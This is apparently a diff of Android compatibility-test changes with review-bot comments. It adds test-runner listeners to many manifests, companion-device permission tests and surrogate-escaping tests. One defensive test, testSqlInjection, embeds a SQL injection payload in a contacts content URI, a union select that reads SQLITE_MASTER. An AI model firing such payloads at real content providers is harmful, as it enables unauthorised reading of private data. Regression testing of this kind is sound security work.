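Review bot: In `testRequestPinAppWidgetNotAllBal`, `new ComponentName(context, EmptyActivity.class)` resolves to the `android.appwidget.cts.activity.EmptyActivity` imported at the top of this file, in the test's own package, whereas `BalService` starts `android.appwidget.cts.appbal.EmptyActivity` in the `android.appwidget.cts.appbal` package. If that reading is right, `waitForFocusedActivity` can never observe the activity under test and `assertFalse` passes whether or not the background launch is blocked; `new ComponentName("android.appwidget.cts.appbal", "android.appwidget.cts.appbal.EmptyActivity")` would target the right component. Separately, `setLauncher` now runs `cmd package set-home-activity` without `--user`, while the `Log.i` line (tagged `"BalActivity"`) prints the old command and the previous call is left commented out, so the log does not match what is executed and runs under a non-default user may set the launcher for the wrong user.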
diff --git a/tests/tests/assist/AndroidManifest.xml b/tests/tests/assist/AndroidManifest.xml
index 1847832..2d68e1a 100644
--- a/tests/tests/assist/AndroidManifest.xml
+++ b/tests/tests/assist/AndroidManifest.xml
@@ -49,5 +49,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.assist.cts"
android:label="CTS tests of android.assist">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/attributionsource/AndroidManifest.xml b/tests/tests/attributionsource/AndroidManifest.xml
index f2599b6..52ccf7d 100644
--- a/tests/tests/attributionsource/AndroidManifest.xml
+++ b/tests/tests/attributionsource/AndroidManifest.xml
@@ -43,6 +43,9 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.attributionsource.cts"
android:label="CTS permission attribution tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml b/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
index adcfeb4..68e7025 100644
--- a/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
+++ b/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
@@ -47,6 +47,9 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.attributionsource.cts.blamed2"
android:label="CTS permission attribution tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/background/AndroidManifest.xml b/tests/tests/background/AndroidManifest.xml
index 1fdda71..f42da76 100755
--- a/tests/tests/background/AndroidManifest.xml
+++ b/tests/tests/background/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.cts.backgroundrestrictions"
android:label="CTS tests for background restrictions">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/batteryhealth/AndroidManifest.xml b/tests/tests/batteryhealth/AndroidManifest.xml
index ce213df..5aee337 100755
--- a/tests/tests/batteryhealth/AndroidManifest.xml
+++ b/tests/tests/batteryhealth/AndroidManifest.xml
@@ -23,6 +23,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.os.cts.batteryhealth"
android:label="CTS tests for battery health features">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/batterysaving/AndroidManifest.xml b/tests/tests/batterysaving/AndroidManifest.xml
index b5c1f70..c28fd40 100755
--- a/tests/tests/batterysaving/AndroidManifest.xml
+++ b/tests/tests/batterysaving/AndroidManifest.xml
@@ -30,6 +30,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.os.cts.batterysaving"
android:label="CTS tests for battery saving features">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/bluetooth/AndroidManifest.xml b/tests/tests/bluetooth/AndroidManifest.xml
index c72a503..a151200 100644
--- a/tests/tests/bluetooth/AndroidManifest.xml
+++ b/tests/tests/bluetooth/AndroidManifest.xml
@@ -38,6 +38,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.bluetooth.cts"
android:label="CTS tests of bluetooth component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/calendarcommon/AndroidManifest.xml b/tests/tests/calendarcommon/AndroidManifest.xml
index 0bbf132..ad94354 100644
--- a/tests/tests/calendarcommon/AndroidManifest.xml
+++ b/tests/tests/calendarcommon/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.calendarcommon2.cts"
android:label="CTS tests of calendarcommon">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<uses-sdk android:minSdkVersion="15" android:targetSdkVersion="17"></uses-sdk>
diff --git a/tests/tests/calendarprovider/AndroidManifest.xml b/tests/tests/calendarprovider/AndroidManifest.xml
index c5d2b11..62562ff 100644
--- a/tests/tests/calendarprovider/AndroidManifest.xml
+++ b/tests/tests/calendarprovider/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts.calendar">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/car/AndroidManifest.xml b/tests/tests/car/AndroidManifest.xml
index fdeb18c..0dfa316 100644
--- a/tests/tests/car/AndroidManifest.xml
+++ b/tests/tests/car/AndroidManifest.xml
@@ -83,5 +83,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.car.cts"
android:label="CTS tests for Automotive">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/car_builtin/AndroidManifest.xml b/tests/tests/car_builtin/AndroidManifest.xml
index 9b19ba4..763b9b5 100644
--- a/tests/tests/car_builtin/AndroidManifest.xml
+++ b/tests/tests/car_builtin/AndroidManifest.xml
@@ -59,6 +59,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.car.cts.builtin"
android:label="CTS tests for car builtin api">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/carrierapi/AndroidManifest.xml b/tests/tests/carrierapi/AndroidManifest.xml
index 0c2f4dc..52057ac 100644
--- a/tests/tests/carrierapi/AndroidManifest.xml
+++ b/tests/tests/carrierapi/AndroidManifest.xml
@@ -30,6 +30,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.carrierapi.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml b/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
index 9283a6c..5478303 100644
--- a/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
+++ b/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.classloaderfactory.memcl.cts"
android:label="CTS tests of android.app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml b/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
index 92be6d6..b2e8b75 100644
--- a/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
+++ b/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.componentfactory.pathcl.cts"
android:label="CTS tests of android.app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/colormode/AndroidManifest.xml b/tests/tests/colormode/AndroidManifest.xml
index f88c7cd..48971af 100644
--- a/tests/tests/colormode/AndroidManifest.xml
+++ b/tests/tests/colormode/AndroidManifest.xml
@@ -31,6 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.colormode.cts"
android:label="Tests for the Color Mode APIs." >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/companion/core/AndroidManifest.xml b/tests/tests/companion/core/AndroidManifest.xml
index f24a164..048558a 100644
--- a/tests/tests/companion/core/AndroidManifest.xml
+++ b/tests/tests/companion/core/AndroidManifest.xml
@@ -23,6 +23,9 @@
android:targetPackage="android.companion.cts.core"
android:label="CompanionDeviceManager Core CTS tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt b/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt
new file mode 100644
index 0000000..8aa26b2
--- /dev/null
+++ b/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt
@@ -0,0 +1,121 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.companion.cts.core
+
+import android.Manifest
+import android.companion.AssociationInfo
+import android.companion.CompanionDeviceManager.MESSAGE_REQUEST_PING
+import android.companion.CompanionDeviceManager.OnMessageReceivedListener
+import android.companion.CompanionDeviceManager.OnTransportsChangedListener
+import android.companion.cts.common.MAC_ADDRESS_A
+import android.companion.cts.common.SIMPLE_EXECUTOR
+import android.platform.test.annotations.AppModeFull
+import androidx.test.ext.junit.runners.AndroidJUnit4
+import kotlin.test.assertFailsWith
+import org.junit.Test
+import org.junit.runner.RunWith
+
+/**
+ * Test System APIs for using CDM transports.
+ *
+ * Run: atest CtsCompanionDeviceManagerCoreTestCases:TransportPermissionTest
+ */
+@AppModeFull(reason = "CompanionDeviceManager APIs are not available to the instant apps.")
+@RunWith(AndroidJUnit4::class)
+class TransportPermissionTest : CoreTestBase() {
+
+ @Test
+ fun test_addOnTransportChangedListener_requiresPermission() {
+ // Create a regular (not self-managed) association.
+ targetApp.associate(MAC_ADDRESS_A)
+ val listener = OnTransportsChangedListener { _: MutableList<AssociationInfo> -> }
+
+ // Attempts to call addOnTransportChangedListener without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.addOnTransportsChangedListener(SIMPLE_EXECUTOR, listener)
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.addOnTransportsChangedListener(SIMPLE_EXECUTOR, listener)
+ }
+
+ // Attempts to call removeOnTransportChangedListener without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.removeOnTransportsChangedListener(listener)
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.removeOnTransportsChangedListener(listener)
+ }
+ }
+
+ @Test
+ fun test_addOnMessageReceivedListener_requiresPermission() {
+ // Create a regular (not self-managed) association.
+ targetApp.associate(MAC_ADDRESS_A)
+ val listener = OnMessageReceivedListener { _: Int, _: ByteArray -> }
+
+ // Attempts to call addOnMessageReceivedListener without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.addOnMessageReceivedListener(SIMPLE_EXECUTOR, MESSAGE_REQUEST_PING, listener)
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.addOnMessageReceivedListener(SIMPLE_EXECUTOR, MESSAGE_REQUEST_PING, listener)
+ }
+
+ // Attempts to call removeOnMessageReceivedListener without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.removeOnMessageReceivedListener(MESSAGE_REQUEST_PING, listener)
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.removeOnMessageReceivedListener(MESSAGE_REQUEST_PING, listener)
+ }
+ }
+
+ @Test
+ fun test_sendMessage_requiresPermission() {
+ // Create a regular (not self-managed) association.
+ targetApp.associate(MAC_ADDRESS_A)
+ val associationId = cdm.myAssociations[0].id
+
+ // Attempts to call sendMessage without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.sendMessage(MESSAGE_REQUEST_PING, byteArrayOf(), intArrayOf(associationId))
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.sendMessage(MESSAGE_REQUEST_PING, byteArrayOf(), intArrayOf(associationId))
+ }
+ }
+}
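Review bot: In `test_sendMessage_requiresPermission`, `cdm.myAssociations[0].id` assumes the association created by `targetApp.associate(MAC_ADDRESS_A)` is the first and only entry; `val associationId = cdm.myAssociations.single().id` would fail loudly if an earlier test left one behind (whatever cleanup `CoreTestBase` performs is outside this hunk). The first test's name and comments say `addOnTransportChangedListener` / `removeOnTransportChangedListener`, while the API actually called is `addOnTransportsChangedListener` / `removeOnTransportsChangedListener`; aligning them makes the test easier to find by API name.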
diff --git a/tests/tests/companion/noservices/AndroidManifest.xml b/tests/tests/companion/noservices/AndroidManifest.xml
index f5c4b9d..a851ff4 100644
--- a/tests/tests/companion/noservices/AndroidManifest.xml
+++ b/tests/tests/companion/noservices/AndroidManifest.xml
@@ -23,6 +23,9 @@
android:targetPackage="android.companion.cts.noservices"
android:label="CompanionDeviceManager No-CompanionDeviceServices CTS tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<application>
diff --git a/tests/tests/companion/uiautomation/AndroidManifest.xml b/tests/tests/companion/uiautomation/AndroidManifest.xml
index 3603685..96355ff 100644
--- a/tests/tests/companion/uiautomation/AndroidManifest.xml
+++ b/tests/tests/companion/uiautomation/AndroidManifest.xml
@@ -27,6 +27,9 @@
android:targetPackage="android.companion.cts.uiautomation"
android:label="CompanionDeviceManager UiAutomation CTS tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<application>
diff --git a/tests/tests/contactsprovider/AndroidManifest.xml b/tests/tests/contactsprovider/AndroidManifest.xml
index 3e4f150..e8ee353 100644
--- a/tests/tests/contactsprovider/AndroidManifest.xml
+++ b/tests/tests/contactsprovider/AndroidManifest.xml
@@ -58,6 +58,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts.contacts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java b/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
index d800206..39d798f 100644
--- a/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
+++ b/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
@@ -99,6 +99,17 @@
return -1;
}
+ public void testSqlInjection() throws Exception {
+ Cursor cursor = getContext()
+ .getContentResolver()
+ .query(Uri.parse("content://contacts/phones/filter/test\uD83D',1))))"
+ + " union select type,name,tbl_name,"
+ + "rootpage,sql from SQLITE_MASTER; --"),
+ new String[]{"starred", "number", "person",
+ "last_time_contacted", "number_key"}, null, null);
+ assertFalse(cursor.moveToFirst());
+ }
+
public void testQueryParameters() throws Exception {
// Test for content types.
assertEquals(Directory.CONTENT_TYPE, mResolver.getType(Directory.CONTENT_URI));
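Review bot: `testSqlInjection` never closes the `Cursor` it gets back and dereferences it without a null check, so a provider that returns `null` for the malformed URI fails with a `NullPointerException` instead of an assertion, and a non-null cursor is leaked. Wrapping the query in try-with-resources and asserting `assertTrue(cursor == null || !cursor.moveToFirst());` covers both; whether a `null` result should count as a pass is a call for the test owner. The class appears to hold `mResolver` already (used in `testQueryParameters` just below), which could replace `getContext().getContentResolver()`. A one-line comment stating what the test guards, e.g. `// An unpaired high surrogate before the quote must not let the filter text break out of its SQL string literal.`, would help the next reader.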
diff --git a/tests/tests/contactsproviderwipe/AndroidManifest.xml b/tests/tests/contactsproviderwipe/AndroidManifest.xml
index e0b10f3..deab721 100644
--- a/tests/tests/contactsproviderwipe/AndroidManifest.xml
+++ b/tests/tests/contactsproviderwipe/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts.contactsproviderwipe">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/content/AndroidManifest.xml b/tests/tests/content/AndroidManifest.xml
index 329ce05..075834c 100644
--- a/tests/tests/content/AndroidManifest.xml
+++ b/tests/tests/content/AndroidManifest.xml
@@ -625,6 +625,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.cts"
android:label="CTS tests of android.content">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<instrumentation android:name="android.content.pm.cts.TestPmInstrumentation"
diff --git a/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java b/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
index dcf9410..0a6bea6 100644
--- a/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
+++ b/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
@@ -16,11 +16,12 @@
package android.content.res.cts;
-import android.content.cts.R;
import android.content.res.Resources;
import android.test.AndroidTestCase;
import android.test.suitebuilder.annotation.SmallTest;
+import android.content.cts.R;
+
public class ResourceNameTest extends AndroidTestCase {
@SmallTest
diff --git a/tests/tests/database/AndroidManifest.xml b/tests/tests/database/AndroidManifest.xml
index d4c0b2a..f47753d 100644
--- a/tests/tests/database/AndroidManifest.xml
+++ b/tests/tests/database/AndroidManifest.xml
@@ -32,6 +32,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.database.cts"
android:label="CTS tests of android.database">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java b/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
index a35a6ac..cef5441 100644
--- a/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
+++ b/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
@@ -75,6 +75,134 @@
super.tearDown();
}
+ public void testHighSurrogateStartInvalid() {
+ String expected = "name=''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testDoubleHighSurrogateStart() {
+ String expected = "name=''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uD83D");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighSurrogatePairInvalid() {
+ String expected = "name=''''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\'");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testValidSurrogate() {
+ String expected = "name='\uD83D\uDC00'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D" + "\uDC00");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testReversedSurrogate() {
+ String expected = "name=''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uDC00" + "\uD83D");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testValidDoubleSurrogate() {
+ String expected = "name='\uD83D\uDC00\uD8FF\uDC01'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uD8FF\uDC01");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testValidDoubleSurrogateWithStringMixed() {
+ String expected = "name='Joh\uD83D\uDC00nn\uD8FF\uDC01y'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Joh\uD83D\uDC00nn\uD8FF\uDC01y");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testInvalidDoubleSurrogateWithStringMixed() {
+ String expected = "name='Johnn\uD8FF\uDC01y'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Joh\uD83Dn\uDC00n\uD8FF\uDC01y");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighLowLowSurrogate() {
+ String expected = "name='\uD83D\uDC00'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uDC01");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighLowLowSurrogateWithString_AtEnd() {
+ String expected = "name='Johnny\uD83D\uDC00'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Johnny\uD83D\uDC00\uDC01");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighLowLowSurrogateWithString_AtMiddle() {
+ String expected = "name='Jo\uD83D\uDC00hnny'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Jo\uD83D\uDC00\uDC01hnny");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighLowLowSurrogateWithString_AtStart() {
+ String expected = "name='\uD83D\uDC00Johnny'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uDC01Johnny");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testLowSurrogateInvalid() {
+ String expected = "name=''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uDC00");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testLowSurrogateInvalidWholeString_AtEnd() {
+ String expected = "name='Johnny'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Johnny\uDC00");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testLowSurrogateInvalidWholeString_AtStart() {
+ String expected = "name='Johnny'''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uDC00Johnny'");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testLowSurrogateInvalidWholeString_AtMiddle() {
+ String expected = "name='Johnny'''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Joh\uDC00nny'");
+ assertEquals(expected, sb.toString());
+ }
+
public void testAppendEscapedSQLString() {
String expected = "name='Mike'";
StringBuilder sb = new StringBuilder("name=");
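Review bot: The added cases leave one adjacency untested: an unpaired low surrogate immediately followed by a quote. `testHighSurrogatePairInvalid` covers a lone high surrogate directly before `'`, but the low-surrogate cases that contain a quote (`"\uDC00Johnny'"`, `"Joh\uDC00nny'"`) always keep ordinary characters between the dropped code unit and the quote. These tests appear to guard the property that dropping a malformed code unit never leaves the following quote undoubled, so I would add a case with input `"\uDC00'"` and, by analogy with the high-surrogate test, expected `"name=''''"` (to be confirmed against the implementation, which is not in this hunk), plus one with a valid pair directly before the quote. A one-line comment on `testHighSurrogatePairInvalid`, such as `// lone high surrogate is dropped; the following quote must still be doubled`, would state its intent more clearly than the name does. The test class and `testAppendEscapedSQLString` continue outside the hunk.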
diff --git a/tests/tests/deviceconfig/AndroidManifest.xml b/tests/tests/deviceconfig/AndroidManifest.xml
index b3790ea..eafb00a 100755
--- a/tests/tests/deviceconfig/AndroidManifest.xml
+++ b/tests/tests/deviceconfig/AndroidManifest.xml
@@ -31,6 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.deviceconfig.cts"
android:label="CTS tests for DeviceConfig API">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/dpi/AndroidManifest.xml b/tests/tests/dpi/AndroidManifest.xml
index 79d32a3..5457d92 100644
--- a/tests/tests/dpi/AndroidManifest.xml
+++ b/tests/tests/dpi/AndroidManifest.xml
@@ -30,5 +30,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.dpi.cts"
android:label="CTS tests for DPI">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/dpi2/AndroidManifest.xml b/tests/tests/dpi2/AndroidManifest.xml
index 8562aa2f..28b5579 100644
--- a/tests/tests/dpi2/AndroidManifest.xml
+++ b/tests/tests/dpi2/AndroidManifest.xml
@@ -30,5 +30,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.dpi2.cts"
android:label="CTS tests for DPI">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/dreams/AndroidManifest.xml b/tests/tests/dreams/AndroidManifest.xml
index 71e2a68..1011f84 100644
--- a/tests/tests/dreams/AndroidManifest.xml
+++ b/tests/tests/dreams/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.dreams.cts"
android:label="CTS tests for the android.service.dreams package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/drm/AndroidManifest.xml b/tests/tests/drm/AndroidManifest.xml
index 127705f..5d8bb7e 100644
--- a/tests/tests/drm/AndroidManifest.xml
+++ b/tests/tests/drm/AndroidManifest.xml
@@ -24,6 +24,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.drm.cts"
android:label="CTS tests of android.drm">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/effect/AndroidManifest.xml b/tests/tests/effect/AndroidManifest.xml
index eeeae51..5323fe6 100644
--- a/tests/tests/effect/AndroidManifest.xml
+++ b/tests/tests/effect/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.effect.cts"
android:label="CTS tests of android.media.effect component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/gamemanager/AndroidManifest.xml b/tests/tests/gamemanager/AndroidManifest.xml
index e2dbbe0..8623cc8 100644
--- a/tests/tests/gamemanager/AndroidManifest.xml
+++ b/tests/tests/gamemanager/AndroidManifest.xml
@@ -44,5 +44,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.gamemanager.cts"
android:label="CTS tests of android Game Manager service">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/gameservice/AndroidManifest.xml b/tests/tests/gameservice/AndroidManifest.xml
index 29e5d19..26dcfd8 100644
--- a/tests/tests/gameservice/AndroidManifest.xml
+++ b/tests/tests/gameservice/AndroidManifest.xml
@@ -68,6 +68,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.gameservice.cts"
android:label="CTS tests for Android Game Service">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/graphics/AndroidManifest.xml b/tests/tests/graphics/AndroidManifest.xml
index 08ac518..c0ae49f 100644
--- a/tests/tests/graphics/AndroidManifest.xml
+++ b/tests/tests/graphics/AndroidManifest.xml
@@ -101,6 +101,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.graphics.cts"
android:label="CTS tests of android.graphics">
